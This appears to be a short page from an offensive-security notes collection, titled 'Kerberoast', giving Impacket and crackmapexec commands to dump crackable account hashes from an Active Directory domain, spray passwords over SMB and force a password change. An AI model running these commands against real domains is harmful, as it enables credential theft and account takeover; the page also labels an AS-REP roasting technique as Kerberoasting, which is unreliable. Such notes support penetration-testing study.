killchain-compendium/enumeration/docs/kerberoast.md

Kerberoast

Usage

• Impacket's GetNPUsers.py to get Hashes of userlist

GetNPUsers.py -no-pass <DomainName>/  -usersfile users.txt -format john -outputfile hashes

• Use crackmapexec to gain access to further user accounts with the password of the user found with GetNPUsers.py

crackmapexec smb $TARGET_IP -u users.txt -p pass.txt

* Watch out for `STATUS_PASSWORD_MUST_CHANGE`
* Change password with 

smbpasswd.py <user>@$TARGET_IP  -newpass password123